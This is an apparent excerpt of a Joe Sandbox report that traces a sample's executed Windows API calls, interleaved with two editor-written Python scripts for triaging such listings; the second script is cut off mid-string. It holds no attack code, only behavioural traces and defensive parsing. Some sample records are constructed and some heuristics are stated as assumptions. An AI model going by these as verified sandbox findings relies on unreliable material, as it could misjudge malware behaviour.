                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 406ac1f8441996184449c47f8c127304cfb4d6b23647e4b431d1237d3dee3c03
                                                                                                                                                                                                    • Instruction ID: 6a30b7bbcfed23ecb505be31eec273525af1172093ca097f7776d968cbbc6d4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 406ac1f8441996184449c47f8c127304cfb4d6b23647e4b431d1237d3dee3c03
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A011CA2AA022BC300822003C02C3B028CC0C2F20332882EF80A88080BA800C2008B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2137025c7198576aba6d4c0569c45a9dd1cfa86860ed1092e5159c9e44f371a2
                                                                                                                                                                                                    • Instruction ID: c3379399df343364ed4de91d0fa5fd3f8eb4abdb62c4c20d483453959bbaa262
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2137025c7198576aba6d4c0569c45a9dd1cfa86860ed1092e5159c9e44f371a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46A011CA2EA0203C300C22A03C02C3B028CC0E2B22333822EF80080080BA80082808B0
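The function records above are Visual C++ delay-load thunks rather than the sample's own logic: every top-level call is `___delayLoadHelper2@8` from the DELAYIMP pseudo-module, and the shared subcall at 0012E85D raises exception code C06D0057, whose facility nibble 0x6D marks it as a VcppException and whose low word 0x57 (87) is the Win32 code ERROR_INVALID_PARAMETER. Several records also share one Instruction ID while differing only in Opcode ID and call site, which is the signature of the same CRT stub instantiated for several delay-imported DLLs. The Python script below is added here as an example; it is not part of Joe Sandbox or of this report. It parses records in the report's plain-text layout, decodes that exception code, flags delay-load stubs, and groups records by Instruction ID so repeated thunks can be skipped as a set. The first two records in `SAMPLE` are abridged from the records on this page; the third (`CreateFileW`/`WriteFile` with an all-zero Instruction ID) is constructed to give the stub filter a negative case.

```python
"""Triage helper for the 'Executed Functions' records of a Joe Sandbox report.
Example code written for this page, not part of Joe Sandbox or of the report."""
import re
from collections import defaultdict

# Layout of a VcppException() code as used by the VC++ delay-load helper (delayimp.h)
FACILITY_VISUALCPP = 0x6D
SEVERITY_ERROR = 0xC0000000
ERROR_INVALID_PARAMETER = 87          # Win32 error 0x57

# One regex for top-level API lines and for "Part of subcall function" lines:
#   • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
#   • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,...), ref: 0012E8E1
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"
    r"(\S+?)\.([A-Za-z0-9_]+)(?:\((.*?)\))?,?\s+ref:\s*([0-9A-Fa-f]+)"
)
KEYVAL_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Records 1 and 2 are abridged from the report above; record 3 is CONSTRUCTED
# for this example so that is_delayload_stub() has a negative case.
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
Similarity
• API String ID: 1269201914-0
• Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Similarity
• API String ID: 1269201914-0
• Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
APIs
• CreateFileW.KERNEL32 ref: 0011A2C0
• WriteFile.KERNEL32 ref: 0011A2F4
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Similarity
• API String ID: 0-0
• Instruction ID: 0000000000000000000000000000000000000000000000000000000000000000
"""


def parse_blocks(text):
    """Split report text into per-function records: top-level APIs, subcalls, metadata."""
    blocks, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()                      # the extracted report is deeply indented
        if not line:
            continue
        if line == "APIs":                      # every record begins with its APIs list
            cur = {"apis": [], "subcalls": [], "meta": {}, "associated": []}
            blocks.append(cur)
            in_apis = True
            continue
        if cur is None:                         # tail of a record that began before this text
            continue
        if line in SECTION_HEADERS:
            in_apis = False
            continue
        if in_apis:
            m = API_RE.match(line)
            if m:
                caller, name, module, args, ref = m.groups()
                call = {"name": name, "module": module, "args": args or "", "ref": ref}
                if caller:                      # "Part of subcall function <caller>: ..."
                    call["caller"] = caller
                    cur["subcalls"].append(call)
                else:
                    cur["apis"].append(call)
            continue
        m = KEYVAL_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).replace("Download File", "").strip()
            if key == "Associated":             # repeated key: keep every dump reference
                cur["associated"].append(value)
            else:
                cur["meta"][key] = value
    return blocks


def decode_vcpp_exception(code):
    """Split a VcppException() code such as 0xC06D0057 into (is_error, facility, win32_error)."""
    return (code & SEVERITY_ERROR) == SEVERITY_ERROR, (code >> 16) & 0x0FFF, code & 0xFFFF


def is_delayload_stub(block):
    """True when every top-level API comes from DELAYIMP, i.e. CRT delay-load plumbing."""
    return bool(block["apis"]) and all(c["module"] == "DELAYIMP" for c in block["apis"])


def raised_vcpp_codes(block):
    """Exception codes (first RaiseException argument) seen anywhere in the record."""
    return [int(c["args"].split(",")[0], 16)
            for c in block["apis"] + block["subcalls"]
            if c["name"] == "RaiseException" and c["args"]]


def group_by(blocks, key):
    groups = defaultdict(list)
    for i, b in enumerate(blocks):
        groups[b["meta"].get(key, "")].append(i)
    return dict(groups)


def triage(text):
    blocks = parse_blocks(text)
    stubs = [i for i, b in enumerate(blocks) if is_delayload_stub(b)]
    return {"total": len(blocks), "delayload_stubs": stubs,
            "worth_reading": [i for i in range(len(blocks)) if i not in stubs],
            "by_instruction_id": group_by(blocks, "Instruction ID")}


if __name__ == "__main__":
    r = triage(SAMPLE)
    print(f"{r['total']} records, stubs {r['delayload_stubs']}, worth reading {r['worth_reading']}")
    for instr_id, idx in r["by_instruction_id"].items():
        print(f"  Instruction ID {instr_id[:16]}... shared by records {idx}")
    is_err, facility, err = decode_vcpp_exception(0xC06D0057)
    print(f"0xC06D0057 -> error={is_err} facility=0x{facility:X} win32_error={err}")
```

Run against a full report export, `by_instruction_id` collapses the repeated delay-load records into one entry per instruction pattern, and `worth_reading` is the list to open in the disassembler first; `decode_vcpp_exception` works for any C06Dxxxx code, not only the one on this page.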
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• SetEndOfFile.KERNELBASE(?,0011903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00119F0C
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
APIs
• SetCurrentDirectoryW.KERNELBASE(?,0012AE72,c:\programdata,00000000,0015946A,00000006), ref: 0012AC08
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
APIs
• CloseHandle.KERNELBASE(000000FF,?,?,001195D6,?,?,?,?,?,00142641,000000FF), ref: 0011963B
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
                                                                                                                                                                                                    • Opcode ID: 907e608b3941dcfa7393aa97da247bc1733edc2789f5a572fdef51dd7b7b9bb1
                                                                                                                                                                                                    • Instruction ID: 8eec100022667989e793190c37e09525802cfeb74c6a7d23e6eaa1eb38907995
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 907e608b3941dcfa7393aa97da247bc1733edc2789f5a572fdef51dd7b7b9bb1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F08270485B159FDB398A24C868BD2B7E9AB22325F041B2ED4F6439E0D76169CDCA60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                      • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0012C2B1
                                                                                                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0012C2C4
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0012C2E0
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0012C2E7
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0012C321
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0012C358
                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0012C36E
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0012C38C
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012C39C
                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0012C3B8
                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0012C3D4
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012C404
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0012C417
                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0012C41E
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012C477
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0012C48A
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0012C4A7
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0012C4C7
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012C4D7
                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0012C4F1
                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0012C509
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012C535
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0012C548
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012C59C
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0012C5AF
                                                                                                                                                                                                      • Part of subcall function 0012AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0012AF35
                                                                                                                                                                                                      • Part of subcall function 0012AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0014E72C,?,?), ref: 0012AF84
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                                                                                                    • Opcode ID: 1fa936ea2962a2c17fe22897ec16212704e4289c7a3b5bdfdfb7fbfb116174c6
                                                                                                                                                                                                    • Instruction ID: 48ec092da80440dea94c88bceed2196c5a2da8aa38b62d442191a9c10070396b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fa936ea2962a2c17fe22897ec16212704e4289c7a3b5bdfdfb7fbfb116174c6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0791A272248354BBD221DBA0DC49FFF77ACEB4AB00F404819F789D6491DB75E6448B62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0012F844
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0012F910
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0012F930
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0012F93A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                    • Opcode ID: 5bd270cc73fab42c5f6134dd2fa6e57f254fcade48a0a63e86c85eec9112293f
                                                                                                                                                                                                    • Instruction ID: 852e6b6546cb39d64d53aaa4b2a4a5920753ae7b9ca9390813ba275b8c43a499
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bd270cc73fab42c5f6134dd2fa6e57f254fcade48a0a63e86c85eec9112293f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C312A75D0522D9BDF20DFA4E9897CCBBB8AF18704F1041EAE40CAB250EB719B858F44
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00116FAA
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00117013
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00117084
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00117AAB
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetLastError.KERNEL32 ref: 00117AF1
                                                                                                                                                                                                      • Part of subcall function 00117A9C: CloseHandle.KERNEL32(?), ref: 00117B00
                                                                                                                                                                                                      • Part of subcall function 0011A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641,000000FF), ref: 0011A1F1
                                                                                                                                                                                                      • Part of subcall function 0011A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641), ref: 0011A21F
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00117139
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00117155
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00117298
                                                                                                                                                                                                      • Part of subcall function 00119DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001173BC,?,?,?,00000000), ref: 00119DBC
                                                                                                                                                                                                      • Part of subcall function 00119DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00119E70
                                                                                                                                                                                                      • Part of subcall function 00119620: CloseHandle.KERNELBASE(000000FF,?,?,001195D6,?,?,?,?,?,00142641,000000FF), ref: 0011963B
                                                                                                                                                                                                      • Part of subcall function 0011A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A501
                                                                                                                                                                                                      • Part of subcall function 0011A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A532
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                                                                                                    • Opcode ID: ba9a6561a846273348edba898d842d30fbf6a3f84d36b79b7715e4c88c660f8c
                                                                                                                                                                                                    • Instruction ID: 42175c9355e63591b42b703d3a8e9ab6425f6d2893d2517516f0c032b38a6066
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba9a6561a846273348edba898d842d30fbf6a3f84d36b79b7715e4c88c660f8c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5C1C575904604AADB29DB74DC81FEEB7B8BF19300F004569F966E72C2D734AAC4CB61
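Two of the entries above are worth triaging mechanically rather than by eye: the four-call chain at 0012F844 to 0012F93A (the report's "Found API chain indicative of debugger detection" signature) and the file-creation routine at 00116FAA whose string table holds SeCreateSymbolicLinkPrivilege and SeRestorePrivilege. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It parses the listing format shown here (call bullets of the form "Api.MODULE(args), ref: addr", including inherited "Part of subcall function" lines, and the "Key: value" bullets under Similarity) and applies one heuristic that is the editor's own, not the sandbox's: IsProcessorFeaturePresent(0x17, PF_FASTFAIL_AVAILABLE) followed by IsDebuggerPresent, SetUnhandledExceptionFilter(0) and UnhandledExceptionFilter, in that order and with nothing else in the function, is the fail-fast stub that MSVC (VS2015 and later) links into binaries for its stack-cookie and fatal-error path, so on its own it is a low-value "anti-debug" hit. The tolerated extra calls (GetCurrentProcess, TerminateProcess) and the use of "$" as the String ID separator are assumptions; the sample text is constructed, copied in shape from two entries on this page.

```python
"""Triage helpers for a Joe Sandbox function listing (added example, not sandbox code)."""
import re
from dataclasses import dataclass, field

# One "• Api.MODULE(args), ref: addr" line; inherited calls carry a "Part of
# subcall function <addr>:" prefix, and LIBCMT helpers print no argument list.
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")  # "• Key: value"

PF_FASTFAIL_AVAILABLE = 0x17
# Call sequence of the MSVC fail-fast stub linked into VS2015+ binaries
# (__scrt_fastfail / __report_gsfailure family): probe __fastfail support,
# check for a debugger, drop any unhandled-exception filter, raise.
CRT_FASTFAIL_CHAIN = ("IsProcessorFeaturePresent", "IsDebuggerPresent",
                      "SetUnhandledExceptionFilter", "UnhandledExceptionFilter")
CRT_FASTFAIL_EXTRAS = {"GetCurrentProcess", "TerminateProcess"}  # assumed tolerable extras

@dataclass
class Call:
    api: str
    module: str
    args: list        # hex tokens or "?" exactly as the report prints them
    ref: str          # call-site address
    subcall_of: str   # callee address for inherited lines, else ""

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def direct_apis(self):
        """APIs the function calls itself, in call-site order."""
        return [c.api for c in self.calls if not c.subcall_of]

    def strings(self):
        """Referenced strings; '$' is assumed to be the report's separator."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]

def parse_report(text):
    """Split a pasted listing into one FunctionEntry per 'APIs' block."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is None or not line:
            continue  # blank, or the tail of a truncated predecessor
        elif (m := CALL_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"] or ""))
        elif (m := FIELD_RE.match(line)) and m["key"] != "Associated":
            cur.fields[m["key"]] = m["val"].strip()
    return entries

def looks_like_crt_fastfail(entry):
    """Editor's heuristic: is this 'debugger detection' hit only the CRT stub?"""
    direct = [c for c in entry.calls if not c.subcall_of]
    names = [c.api for c in direct]
    if not set(CRT_FASTFAIL_CHAIN) <= set(names) <= set(CRT_FASTFAIL_CHAIN) | CRT_FASTFAIL_EXTRAS:
        return False
    positions = [names.index(n) for n in CRT_FASTFAIL_CHAIN]
    if positions != sorted(positions):
        return False  # the same APIs in another order is something else
    probe = direct[positions[0]]
    return bool(probe.args) and probe.args[0] != "?" and int(probe.args[0], 16) == PF_FASTFAIL_AVAILABLE

def triage(entry):
    """One-line verdict so a report with thousands of entries can be skimmed."""
    if looks_like_crt_fastfail(entry):
        return "CRT fail-fast stub, not anti-debug"
    privs = [s for s in entry.strings() if s.startswith("Se") and s.endswith("Privilege")]
    if privs:
        return "references privilege names: " + ", ".join(privs)
    return "no triage rule matched"

# Constructed sample, copied in shape from two of the entries on this page.
SAMPLE = r"""
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0012F844
• IsDebuggerPresent.KERNEL32 ref: 0012F910
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0012F930
• UnhandledExceptionFilter.KERNEL32(?), ref: 0012F93A
Similarity
• String ID:
• API String ID: 254469556-0
APIs
• __EH_prolog.LIBCMT ref: 00116FAA
• _wcslen.LIBCMT ref: 00117013
  • Part of subcall function 00117A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00117AAB
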